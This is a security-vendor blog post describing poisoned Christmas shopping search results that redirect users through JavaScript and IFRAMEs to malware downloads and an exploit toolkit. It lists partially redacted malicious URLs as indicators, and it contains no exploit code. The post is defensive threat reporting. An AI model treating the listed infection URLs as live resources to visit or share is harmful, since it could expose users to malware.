Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    September 2014
    S M T W T F S
    « Aug    
     123456
    78910111213
    14151617181920
    21222324252627
    282930  
  • About Us

    You better watch out and you’ll probably cry as Web threats come to town with a bang. Yes, it’s that time of the year again when we search for Christmas goodies online. Sad to say, it’s also that time of year when cyber hooligans compromise innocent Web searches such as the simple phrase “christmas gift shopping” to serve up malicious URLs via search results such as this:

    Lo and behold, one innocent search turns into a Web threat nightmare. Searching for the above phrase can lead you to the malicious URLs encircled in the image above. Clicking on these URLs then takes you to another site (http://{BLOCKED}ldgonit.com/search.php?gzapr=…) via a JavaScript that eventually leads to the download and execution of a malware. Good thing Trend Micro Web Threat Protection already prevents malicious downloads from these URLs, protecting users from possible infection.

    The site mentioned above also has an IFRAME that allows for redirection and installation of more malware on the affected system from the URLs http://{BLOCKED}id.theoreon.com/setup.php?aff_id=6025 and http://{BLOCKED}aga.com/exe.php?pid=1008.

    We keep coming up with different binaries for every download, suggesting rehashing on the server-side. Expect more new ones to come our way this Christmas.

    Digging deeper into the scene, extending the discovery by Sunbelt of malicious URLs creeping up in christmas related searches, the .CN domains above are also being rampantly advertised in Japanese forums/blogs/bbs, et al.:

    Other compromised Christmas-y Google searches:

    • christmas gift shopping
    • christmas holiday sale
    • holiday shopping fun

    Note that there could be more variations to this theme of searches.

    Moreover, the IFRAME mentioned above also uses the so-called 404 Web threat toolkit – probably a new version- in some of its infection URL vectors:

    • http://{BLOCKED}sliksuka.com/check/version.php?t=148
    • http://{BLOCKED}sliksuka.com/check/n14041.htm
    • http://{BLOCKED}sliksuka.com/check/n14042.htm
    • http://{BLOCKED}sliksuka.com/check/n14043.htm
    • http://{BLOCKED}sliksuka.com/check/n14044.htm
    • http://{BLOCKED}sliksuka.com/check/n14045.htm
    • http://{BLOCKED}sliksuka.com/check/n14046.htm
    • http://{BLOCKED}sliksuka.com/check/n14047.htm
    • http://{BLOCKED}sliksuka.com/check/n14048.htm
    • http://{BLOCKED}mndskj.com/check/vers2.php
    • http://{BLOCKED}mndskj.com/check/tpknlkk433.php
    • http://{BLOCKED}mndskj.com/check/tpktskk2.php

    A graphical representation of this routine is as follows:

    Here are some of the malware and grayware programs that are installed on the affected system from several other Web sites where the user is redirected to:

    Ho, ho, ho, a malware-y christmas to us all indeed. Malware is just a click away, but cautious and vigilant online shopping can keep your computer’s infection at bay. Having solid Web threat protection like Trend Micro at your back wouldn’t hurt either.





    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon






     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice